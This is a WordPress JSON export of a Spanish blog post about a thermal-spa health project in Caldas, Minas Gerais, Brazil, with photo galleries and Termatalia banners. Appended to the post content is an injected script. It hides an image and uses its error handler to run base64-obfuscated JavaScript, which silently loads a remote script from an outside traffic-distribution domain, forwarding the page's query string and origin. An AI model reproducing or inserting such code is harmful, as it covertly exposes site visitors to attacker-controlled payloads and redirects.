{"id":4511,"date":"2021-07-08T12:45:22","date_gmt":"2021-07-08T15:45:22","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4511"},"modified":"2025-08-13T16:30:25","modified_gmt":"2025-08-13T19:30:25","slug":"pocinhos-do-rio-verde-en-caldas-mg-un-atractivo-resort-para-un-centro-termal-que-se-reestructura-en-brasil","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4511","title":{"rendered":"Pocinhos do Rio Verde en Caldas\/MG, un atractivo resort para un centro termal que se reestructura en Brasil"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\"><em>Les compartimos este art\u00edculo de la Dra. Jussarra Marrichi de Brasil, experta que ha participado ya como ponente en varias ediciones de Termatalia y a la que muchos de ustedes conocer\u00e1n. Nos habla del ejemplo de Pocinhos de Rio Verde en Caldas (Estado de Minas Gerais) como ejemplo de involucraci\u00f3n de la poblaci\u00f3n local en la cultura termal en un contexto de pandemia.<\/em><\/h5>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021.png\" alt=\"\" class=\"wp-image-4518\" width=\"321\" height=\"179\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021.png 909w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021-300x167.png 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021-768x428.png 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021-696x385.png 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/termatalia-2021-755x420.png 755w\" sizes=\"(max-width: 321px) 100vw, 321px\" \/><\/a><figcaption><span style=\"color:#0693e3\" class=\"tadv-color\">Publicidad<\/span><\/figcaption><\/figure><\/div>\n\n\n\n<p>Art\u00edculo:<\/p>\n\n\n\n<p>Durante aproximadamente un a\u00f1o y cuatro meses hemos estado viviendo con una de las peores pandemias de los \u00faltimos a\u00f1os: Covid-19. Durante este per\u00edodo, adem\u00e1s de los casi cuatro millones de vidas perdidas y la incertidumbre de d\u00edas mejores, (al menos en los pa\u00edses menos desarrollados y en los pa\u00edses en v\u00edas de desarrollo donde a\u00fan no se ha completado la vacunaci\u00f3n), esperamos el momento em el que podremos movernos libremente por los espacios de las ciudades sin el uso de m\u00e1scaras protectoras, como ya ocurre en algunos pa\u00edses como Nueva Zelanda, Israel, Estados Unidos y Francia.<\/p>\n\n\n\n<p>Espec\u00edficamente en Brasil, donde solo el 12,79% de la poblaci\u00f3n est\u00e1 totalmente inmunizada, a\u00fan existen recurrentes medidas restrictivas a la circulaci\u00f3n que contin\u00faan afectando la econom\u00eda en general y el sector tur\u00edstico, especialmente en las ciudades balnearias e hidrominerales que sufren restricciones de tiempo cierre de parques y atractivos tur\u00edsticos p\u00fablicos y privados.<\/p>\n\n\n\n<p>La tradici\u00f3n termal en Brasil se remonta al uso de agua caliente utilizada por los ind\u00edgenas alrededor de 1545. Despu\u00e9s de la inauguraci\u00f3n de su primer hospital termal en Caldas da Imperatriz \/ SC en 1818, aparecieron las primeras publicaciones cient\u00edficas y tesis m\u00e9dicas a mediados del siglo XIX. A principios del siglo XX, las ciudades balneario se reestructuraron y \/ o construyeron a favor de las aguas minerales. Y ya en las \u00faltimas d\u00e9cadas del siglo XX, alcanzaron la representaci\u00f3n tur\u00edstica y de ocio, lo que les garantiza un turismo termal vinculado a los pasos iniciales del turismo de bienestar y salud en las primeras d\u00e9cadas del siglo XXI. Por tanto, el termalismo que nace con aspectos m\u00e9dicos y terap\u00e9uticos se extiende en gran medida a las \u00faltimas categor\u00edas tur\u00edsticas mencionadas anteriormente. A lo largo de su historia se destaca, por tanto, la actividad termal orientada al ocio y actividades tur\u00edsticas y hay una disminuci\u00f3n de la investigaci\u00f3n cient\u00edfica en hidrolog\u00eda m\u00e9dica. Sin embargo, en 2006 el Ministerio de Salud reconoce al Termalismo Social como una pr\u00e1ctica integradora y complementaria y lanza manuales y gu\u00edas para su inserci\u00f3n en municipios con fuentes de agua mineral, pero a pesar de la pol\u00edtica establecida, los balnearios y municipios no reciben compensaci\u00f3n del Ministerio de Salud. por sus tratamientos para que el Termalismo en Brasil no reciba los incentivos reales de sus gobernantes. El termalismo y todas sus concepciones de vida, prevenci\u00f3n, rehabilitaci\u00f3n, salud y bienestar parecen estar siempre al margen de la sociedad brasile\u00f1a, a pesar del gran esfuerzo de pocos estudiosos que a\u00fan se enfocan en el tema y lo defienden. Cuando se practica bien, no resiste los cambios pol\u00edticos y los proyectos que hab\u00edan dado sus frutos, perdi\u00e9ndose en medio de esta historia.<\/p>\n\n\n\n<p>Y sobre estos puntos y pensando en la situaci\u00f3n actual de los balnearios brasile\u00f1os frente a la pandemia, estoy cada vez m\u00e1s segura de algo que vengo defendiendo desde hace mucho tiempo, que el Termalismo es ante todo acceso y prioridad. Es una palabra amplia con conceptos din\u00e1micos que se mueven seg\u00fan las necesidades humanas, y al igual que el agua que est\u00e1 en constante movimiento, la palabra termalismo se mueve en varios brazos que hay que trabajar por el bien de todos, de la poblaci\u00f3n local y tambi\u00e9n de los visitantes.&nbsp; Es como un p\u00e9ndulo: el equilibrio, el \u00e9xito y su mantenimiento est\u00e1n en la armon\u00eda del movimiento donde uno no existe sin el otro, es decir, para practicarlo y potenciarlo hay que trabajar con el termalismo cl\u00e1sico &#8211; el m\u00e9dico asoci\u00e1ndolo al bienestar termalismo.<\/p>\n\n\n\n<p>A\u00fan en este tema y pensando en la realidad brasile\u00f1a actual frente a las restricciones que a\u00fan impone la pandemia, estoy segura de que esto, a pesar de ser un momento dif\u00edcil para las actividades Termales en el pa\u00eds, tambi\u00e9n es un hito y un divisor de conocimiento, porque si estas ciudades volvieran a sus or\u00edgenes, seguramente estar\u00edan cumpliendo esa funci\u00f3n inicial practicada en el pasado: la restauraci\u00f3n de la salud a trav\u00e9s de las aguas minerales y aprovechar\u00edan este momento para realizar nuevas investigaciones y divulgaci\u00f3n de pr\u00e1cticas termales entre la poblaci\u00f3n, ya que los viajes al interior del pa\u00eds a\u00fan sufren las restricciones.<\/p>\n\n\n\n<p>Y a\u00fan en este punto, cabe mencionar aqu\u00ed, en este evento mundial, la iniciativa del gobierno municipal de la ciudad de Caldas \/ MG, un balneario hidro-mineral con una altitud de 1062 metros sobre el nivel del mar con clima de monta\u00f1a, rodeado de monta\u00f1as y bosques, con atractivos geogr\u00e1ficos y tres fuentes de agua mineral ubicadas en un hermoso parque en el distrito de Pocinhos do Rio Verde, donde se encuentra el Balneario Dr. Reynaldo de Oliveira Pimenta con sus fuentes alcalinas de azufre, carbonato y bicarbonato de sodio.<\/p>\n\n\n\n<p>La iniciativa es encomiable porque la propuesta para la implementaci\u00f3n de pr\u00e1cticas t\u00e9rmicas tiene como prioridad a la poblaci\u00f3n local, independientemente de contraparte o recursos provenientes del Ministerio de Salud, y para ello ya se encuentran en marcha las siguientes iniciativas:&nbsp;<\/p>\n\n\n\n<p>\u2022 Proyecto de Ley para la implementaci\u00f3n de la Pol\u00edtica Municipal de Pr\u00e1cticas Integrativas y Complementarias en Salud &#8211; PMPICS &#8211; en el Sistema \u00danico de Salud &#8211; SUS &#8211; con \u00e9nfasis en Termalismo Social.<br>\u2022 Proyecto de fibromialgia con un equipo multidisciplinar con m\u00e9dico, fisioterapeuta y psic\u00f3logo para el uso de ba\u00f1os termales y ambiente termal.<br>\u2022 Proyecto de balneoterapia para residentes diagnosticados de reumatismo y \u00falceras por presi\u00f3n.<br>\u2022 Implantaci\u00f3n de Est\u00e9tica T\u00e9rmica para el tratamiento del acn\u00e9 grado I y II.<br>\u2022 Educaci\u00f3n termal para ni\u00f1os y adolescentes del sistema escolar p\u00fablico para valorizar la historia y la cultura termal.<br>Para la primera fase de la implementaci\u00f3n de las actividades termales en el Balneario de Pocinhos do Rio Verde, todo el equipo recibi\u00f3 capacitaci\u00f3n te\u00f3rica y pr\u00e1ctica en los siguientes temas:<br>\u2022 Historia del Termalismo en el Mundo y en Brasil<br>\u2022 Definiciones y aplicaciones del termalismo<br>\u2022 Balneoterapia<br>\u2022 Definiciones actualizadas del termalismo portugu\u00e9s<br>\u2022 Sectores y definiciones de un spa<br>\u2022 Manual de limpieza, saneamiento y cuidado contra COVID-19.<br>\u2022 Aguas minerales. Crenoterapia.<\/p>\n\n\n\n<p>Esta propuesta tiene como objetivo primordial, el acceso y difusi\u00f3n de la cultura termal a la comunidad local que, a pesar de la riqueza natural, no hace uso de fuentes y t\u00e9cnicas termales. El m\u00e9rito del equipo multidisciplinar de salud que se est\u00e1 formando es la voluntad y ganas de aprender la lecci\u00f3n de Termalismo y, en general, todo el equipo del Balneario se ha mostrado receptivo y atento, pues cree en un cambio de realidad. Creen en mejores d\u00edas para su comunidad, creen que hacerlo en interiores primero podr\u00e1 sensibilizar a los forasteros sobre los beneficios del uso de aguas minerales. Creen que Caldas merece su lugar destacado en un proyecto que nace en medio de una pandemia en Brasil con el objetivo de transformarlo en un gran centro de salud termal con proyectos amparados por ley para que, en un futuro cercano, sepan c\u00f3mo actuar sin miedo, ante las adversidades o cambios pol\u00edticos que a\u00fan rodean a las aguas minerales.<\/p>\n\n\n\n<p>Dra. Jussara M.O.MarrichiTurism\u00f3loga responsable para la implementaci\u00f3n del proyecto de Termalismo em Caldas (Estado de Minas Gerais)<\/p>\n\n\n\n<figure class=\"wp-block-gallery columns-3 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf.jpg\"><img decoding=\"async\" width=\"800\" height=\"600\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf.jpg\" alt=\"\" data-id=\"4512\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4512\" class=\"wp-image-4512\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-768x576.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-696x522.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/HF56akf-560x420.jpg 560w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/J2ur1u2.jpg\"><img decoding=\"async\" width=\"600\" height=\"800\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/J2ur1u2.jpg\" alt=\"\" data-id=\"4513\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4513\" class=\"wp-image-4513\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/J2ur1u2.jpg 600w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/J2ur1u2-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/J2ur1u2-315x420.jpg 315w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/664sEZH.jpg\"><img decoding=\"async\" width=\"600\" height=\"800\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/664sEZH.jpg\" alt=\"\" data-id=\"4514\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4514\" class=\"wp-image-4514\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/664sEZH.jpg 600w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/664sEZH-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/664sEZH-315x420.jpg 315w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/j736j9x.jpg\"><img decoding=\"async\" width=\"600\" height=\"800\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/j736j9x.jpg\" alt=\"\" data-id=\"4515\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4515\" class=\"wp-image-4515\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/j736j9x.jpg 600w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/j736j9x-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/j736j9x-315x420.jpg 315w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/r7763X3.jpg\"><img decoding=\"async\" width=\"600\" height=\"800\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/r7763X3.jpg\" alt=\"\" data-id=\"4516\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4516\" class=\"wp-image-4516\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/r7763X3.jpg 600w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/r7763X3-225x300.jpg 225w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/r7763X3-315x420.jpg 315w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91.jpg\"><img decoding=\"async\" width=\"800\" height=\"600\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91.jpg\" alt=\"\" data-id=\"4517\" data-full-url=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91.jpg\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4517\" class=\"wp-image-4517\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-768x576.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-696x522.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/or5dT91-560x420.jpg 560w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/figure><\/li><\/ul><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"827\" height=\"98\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/Banner-congreso-termatalia.jpg\" alt=\"\" class=\"wp-image-4503\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/Banner-congreso-termatalia.jpg 827w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/Banner-congreso-termatalia-300x36.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/Banner-congreso-termatalia-768x91.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/Banner-congreso-termatalia-696x82.jpg 696w\" sizes=\"(max-width: 827px) 100vw, 827px\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Les compartimos este art\u00edculo de la Dra. Jussarra Marrichi de Brasil, experta que ha participado ya como ponente en varias ediciones de Termatalia y a la que muchos de ustedes conocer\u00e1n. Nos habla del ejemplo de Pocinhos de Rio Verde en Caldas (Estado de Minas Gerais) como ejemplo de involucraci\u00f3n de la poblaci\u00f3n local en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4519,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,14,17],"tags":[],"class_list":["post-4511","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-de-bienestar","category-turismo-salud","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4511","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4511"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4511\/revisions"}],"predecessor-version":[{"id":10812,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4511\/revisions\/10812"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4519"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4511"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4511"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4511"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}